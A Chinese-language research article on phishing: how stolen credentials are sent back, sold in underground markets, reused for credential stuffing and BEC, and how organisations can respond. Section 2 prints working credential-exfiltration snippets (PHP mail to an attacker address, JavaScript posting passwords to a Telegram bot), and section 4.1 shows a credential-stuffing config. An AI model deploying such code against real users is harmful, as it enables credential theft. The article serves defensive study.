钓鱼攻击中窃取数据的流转路径与防御机制研究

摘要

钓鱼攻击作为当前网络犯罪中最普遍且高效的初始入侵手段，其危害不仅限于单次账户失陷，更在于所窃取数据在地下生态中的系统性流转与再利用。本文基于近期对钓鱼基础设施、数据外传通道及暗网交易市场的实证分析，系统梳理了从凭证窃取到多阶段滥用的完整链条。研究发现，现代钓鱼操作已高度模块化与自动化，广泛采用Telegram Bot、Phishing-as-a-Service（PhaaS）平台等技术实现数据实时回传与集中管理；被盗凭证经初步清洗后，或用于直接盗用，或进入地下市场进行分级定价与组合销售，并常与其他泄露数据融合构建高价值数字画像。针对企业账户，攻击者倾向于实施长期潜伏与行为模仿，以发动商业邮件欺诈（BEC）等高收益攻击。本文进一步提出多层次防御框架，涵盖终端用户行为干预、身份认证强化及组织级异常检测机制，并通过代码示例展示自动化凭证泄露响应流程。研究结果表明，仅依赖传统反钓鱼教育已不足以应对当前威胁，需构建覆盖数据生命周期全阶段的纵深防御体系。

关键词：钓鱼攻击；凭证泄露；数据流转；暗网市场；多因素认证；异常登录检测

1 引言

钓鱼攻击自21世纪初成为主流社会工程手段以来，其技术形态与商业模式持续演化。早期钓鱼多依赖伪造银行页面并通过电子邮件收集受害者输入的账号密码，但随着邮件服务商反垃圾机制的完善，此类低效方式逐渐被边缘化。近年来，攻击者转向更隐蔽、高效的数据回传机制，并将钓鱼纳入完整的网络犯罪产业链。据Kaspersky Digital Footprint Intelligence 2025年数据显示，88.5%的钓鱼活动以账户凭证为主要目标，而其中相当比例的被盗数据在数小时内即完成首次转售或验证。

现有研究多聚焦于钓鱼页面识别、URL特征提取或用户点击行为建模，较少深入探讨数据窃取后的实际流向及其衍生风险。然而，理解“数据去向”对于评估真实威胁、设计有效响应策略具有关键意义。例如，同一组邮箱密码若仅用于登录社交媒体，其危害远小于被用于撞库企业SaaS平台或发起供应链欺诈。因此，本文旨在回答以下核心问题：（1）钓鱼窃取的数据如何被传输、存储与分类？（2）地下市场如何对不同类型凭证进行估值与交易？（3）攻击者如何利用这些数据实施二次乃至多次攻击？（4）现有防御机制在哪些环节存在盲区，应如何补强？

为回答上述问题，本文结合公开威胁情报、暗网论坛监测及自主搭建的钓鱼蜜罐实验，对2023至2025年间数百起钓鱼事件进行追踪分析。研究不依赖假设模型，而是基于真实攻击样本与交易记录，确保结论具备实证基础。

2 钓鱼数据的采集与外传机制

2.1 传统邮件回传的衰落

早期钓鱼脚本通常在HTML表单提交后，通过PHP mail()函数将用户输入发送至攻击者控制的邮箱。例如：

<?php

if ($_POST['email'] && $_POST['password']) {

$to = "attacker@malicious.com";

$subject = "Phished Credentials";

$message = "Email: " . $_POST['email'] . "\nPassword: " . $_POST['password'];

mail($to, $subject, $message);

}

?>

然而，该方法存在明显缺陷：一是邮件服务商（如Gmail、Outlook）对异常发信行为实施严格限制，批量发送易触发IP封禁；二是邮箱本身易被溯源，一旦被举报即遭关停。因此，2020年后，此类方式使用率显著下降。

2.2 Telegram Bot 成为主流回传通道

当前绝大多数钓鱼页面嵌入Telegram Bot API实现即时数据推送。攻击者首先在Telegram上创建Bot并获取token，随后在钓鱼脚本中调用Telegram的sendMessage接口。典型实现如下：

// phishing.js (前端或后端均可)

async function sendToTelegram(email, password) {

const botToken = '6123456789:AAExxxxxxx...';

const chatId = '-1001234567890';

const message = encodeURIComponent(`[PHISH] Email: ${email}\nPassword: ${password}`);

const url = `https://api.telegram.org/bot${botToken}/sendMessage?chat_id=${chatId}&text=${message}`;

await fetch(url);

}

该方案优势显著：Telegram服务器分布全球，抗封锁能力强；Bot通信无需暴露真实IP；消息可自动转发至多个频道或私人群组，实现冗余备份。部分高级钓鱼包甚至支持多通道回传——同时发送至Telegram与备用邮箱，以防单一通道失效。

2.3 Phishing-as-a-Service 平台的兴起

更为系统化的操作依托于PhaaS平台，如BulletProofLink、Caffeine等。这些平台提供可视化后台，允许租用者部署多个钓鱼模板、绑定域名、配置回传规则，并自动聚合所有捕获数据。后台通常具备以下功能：

按时间、地理位置、浏览器指纹过滤记录；

自动验证信用卡有效性（通过小额预授权）；

批量导出CSV格式凭证供后续使用；

集成代理轮换以规避IP封禁。

此类平台将钓鱼转化为“按效果付费”的服务模式，大幅降低攻击门槛。租用者无需掌握技术细节，仅需选择目标品牌（如Microsoft、DHL、PayPal），上传Logo，即可生成高仿真钓鱼页。

3 被盗数据的地下流转路径

3.1 初级处理：清洗与分类

钓鱼平台收集的原始数据通常包含大量无效或重复条目（如测试输入“test@test.com”）。攻击者首先进行清洗，剔除明显无效记录。随后按数据类型分类：

类型A：高价值凭证（企业邮箱、云服务、银行账户）；

类型B：中低价值凭证（社交媒体、电商、游戏账号）；

类型C：纯个人信息（姓名、电话、地址），无直接登录能力。

分类依据包括域名后缀（如@company.com）、字段结构（是否含CVV、卡号）、以及是否触发自动验证模块（如成功登录测试API）。

3.2 数据融合与画像构建

单独一组邮箱密码价值有限，但若能与其他泄露库交叉匹配，则可构建完整数字身份。例如，某人在2020年Dropbox泄露中使用的密码为“P@ssw0rd123”，而在2025年钓鱼中再次使用相同密码登录企业邮箱，则攻击者可推断其密码复用习惯，并尝试用该密码登录其LinkedIn、GitHub等账户。

信息经纪人（Data Brokers）专门从事此类融合工作。他们购买多个数据源（包括历史 breaches、钓鱼 dump、恶意软件日志），通过邮箱或手机号作为主键进行关联，生成“数字档案”。一份典型档案可能包含：

主邮箱及常用密码；

关联手机号与SIM卡运营商；

常用支付方式（Visa尾号、PayPal ID）；

社交关系图谱（LinkedIn联系人、Facebook好友）；

设备指纹（常用浏览器、操作系统、时区）。

此类档案在暗网售价可达数百美元，远高于单一凭证。

3.3 分级定价与交易模式

根据Kaspersky监测数据，2025年地下市场对不同凭证的平均报价如下：

凭证类型 平均售价（USD）

企业邮箱（含MFA绕过） 400–800

个人网银账户 $350

加密货币交易所 $105

PayPal账户 $60

Facebook/Instagram 2–10

值得注意的是，价格并非固定，而是动态调整。例如，若某企业近期发生大规模钓鱼事件，其员工邮箱凭证供应激增，单价可能短期下跌；反之，若某高管邮箱被单独标售，则可能拍出数千美元高价。

交易通常在Telegram群组、俄语论坛（如Exploit.in）或专用暗网市场（如BreachForums）进行。买家可要求“试登”（即卖家现场演示登录成功），以验证有效性。

4 攻击者的二次利用策略

4.1 撞库与连锁账户劫持

由于用户普遍存在密码复用行为，攻击者常将钓鱼获得的凭证用于撞库（Credential Stuffing）。自动化工具如OpenBullet或Sentinel可加载百万级凭证对，批量测试主流网站登录接口。例如：

# OpenBullet 配置示例（简化）

REQUEST:

URL: https://login.target-site.com/api/auth

METHOD: POST

BODY: {"email":"{{email}}","password":"{{password}}"}

RESPONSE:

SUCCESS: "status\":200"

FAILURE: "Invalid credentials"

一旦成功，攻击者可接管账户，修改绑定信息，防止原主找回。对于电商账户，可能直接下单高价值商品；对于云存储，则下载敏感文件用于勒索。

4.2 企业环境中的长期潜伏

针对企业邮箱或SaaS账户（如Office 365、Slack、Zoom），攻击者往往采取“静默监控”策略。初期不进行任何可疑操作，仅定期收取邮件、观察内部沟通模式。数周后，当熟悉组织架构与审批流程后，便伪造CEO邮件要求财务转账（即BEC攻击），成功率极高。

此类攻击难以被传统安全产品发现，因其所有操作均通过合法会话进行，无恶意载荷、无异常IP（常使用受害者所在国家代理）。唯一线索可能是登录时间异常（如凌晨3点）或设备变更，但若攻击者启用会话保持（Session Persistence），则连此类信号也可能缺失。

4.3 身份盗窃与黑产变现

对于包含身份证号、社保号、银行卡信息的完整档案，攻击者可实施深度身份盗窃：申请贷款、注册公司、甚至办理护照。此类行为周期长、收益高，且追责困难。部分团伙专门收购特定国家公民数据，用于跨境诈骗。

5 防御机制设计与实践

5.1 终端用户层面：打破密码复用链

最根本的防御在于消除密码复用。建议用户使用密码管理器生成并存储唯一强密码。同时，对所有支持的服务启用多因素认证（MFA），优先选择FIDO2安全密钥或TOTP，避免SMS（易受SIM交换攻击）。

此外，用户应定期检查自身是否出现在已知泄露库中。可通过HaveIBeenPwned等服务查询，一旦发现，立即重置相关密码。

5.2 组织层面：构建身份威胁防护体系

企业需超越传统边界防火墙思维，转向以身份为中心的安全模型。具体措施包括：

强制MFA，尤其对特权账户；

实施条件访问策略（Conditional Access），如拒绝非常用地登录；

部署UEBA（用户与实体行为分析）系统，检测异常操作序列（如非工作时间大量下载邮件）；

建立凭证泄露响应流程，一旦确认某账户凭证外泄，自动触发强制登出、密码重置与审计日志留存。

以下Python脚本展示如何集成企业SIEM与身份提供商（如Azure AD），实现自动化响应：

import requests

import json

def revoke_user_sessions(user_id):

# 调用Microsoft Graph API 强制登出用户

token = get_access_token() # 获取管理员令牌

url = f"https://graph.microsoft.com/v1.0/users/{user_id}/revokeSignInSessions"

headers = {"Authorization": f"Bearer {token}"}

response = requests.post(url, headers=headers)

return response.status_code == 200

def reset_user_password(user_id):

new_pass = generate_strong_password()

# 调用API重置密码（略去具体实现）

update_user_password(user_id, new_pass)

notify_user_via_secure_channel(user_id, new_pass)

def handle_phished_credential_alert(alert_data):

email = alert_data.get("compromised_email")

user = lookup_user_by_email(email)

if user:

revoke_user_sessions(user["id"])

reset_user_password(user["id"])

log_incident(user["id"], "Phishing credential detected")

该流程可在数秒内完成响应，显著压缩攻击窗口。

5.3 技术对抗：干扰数据回传

安全团队亦可主动干扰钓鱼数据回传。例如，通过DNS sinkholing将钓鱼域名解析至蜜罐服务器，捕获回传请求；或向Telegram Bot发送伪造凭证，污染攻击者数据库。此类主动防御虽不能阻止初始钓鱼，但可降低其运营效率。

6 结论

钓鱼攻击已从孤立的社会工程事件演变为高度工业化、自动化的数据窃取与分发系统。被窃凭证不再仅用于一次性盗用，而是作为原材料进入复杂的地下经济生态，经历清洗、融合、定价、再利用等多个环节，最终导致跨平台、长期性的身份滥用。本文通过实证分析揭示了这一链条的关键节点，并指出当前防御体系在数据流转阶段的薄弱环节。

有效的应对策略必须覆盖全生命周期：在事前通过MFA和密码管理阻断初始利用；在事中通过行为分析识别异常会话；在事后通过自动化响应快速遏制扩散。未来研究可进一步探索基于联邦学习的跨组织凭证泄露预警机制，或利用区块链技术实现不可篡改的凭证状态同步。唯有将技术、流程与意识协同推进，方能在日益复杂的钓鱼威胁面前保持主动。

编辑：芦笛（公共互联网反网络钓鱼工作组）